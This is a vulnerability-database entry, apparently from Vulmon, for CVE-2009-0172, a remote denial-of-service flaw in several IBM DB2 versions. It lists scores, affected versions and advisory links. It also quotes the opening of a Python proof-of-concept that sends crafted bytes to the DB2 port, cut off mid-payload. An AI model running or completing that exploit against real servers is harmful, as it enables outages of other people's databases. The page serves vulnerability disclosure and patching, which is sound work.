Published: 16/01/2009 Updated: 08/08/2017

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

VMScore: 505

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Unspecified vulnerability in IBM DB2 8 before FP17a, 9.1 before FP6a, and 9.5 before FP3a allows remote malicious users to cause a denial of service (infinite loop) via a crafted CONNECT data stream.

Vulnerable Product	Search on Vulmon	Subscribe to Product
ibm db2 universal database 9.1
ibm db2 universal database 9.5

# Discovered by Dennis Yurichev <dennis@conusinfo> # DB2TEST database should be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobjconnect ((argv[1], 50000)) sockobjsend( "\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" "\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x ...

CWE-20 http://www-1.ibm.com/support/docview.wss?uid=swg1IZ37697 http://www-01.ibm.com/support/docview.wss?uid=swg21363936 http://secunia.com/advisories/33529 http://securitytracker.com/id?1021591 http://www.securityfocus.com/bid/33258 http://www-1.ibm.com/support/docview.wss?uid=swg1IZ36534 ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v91/APARLIST.TXT http://www-01.ibm.com/support/docview.wss?uid=swg1IZ37696 ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v95/APARLIST.TXT ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v82/APARLIST.TXT http://www.vupen.com/english/advisories/2009/0137 https://exchange.xforce.ibmcloud.com/vulnerabilities/47931 https://nvd.nist.gov https://www.exploit-db.com/exploits/8344/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2009-0172

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect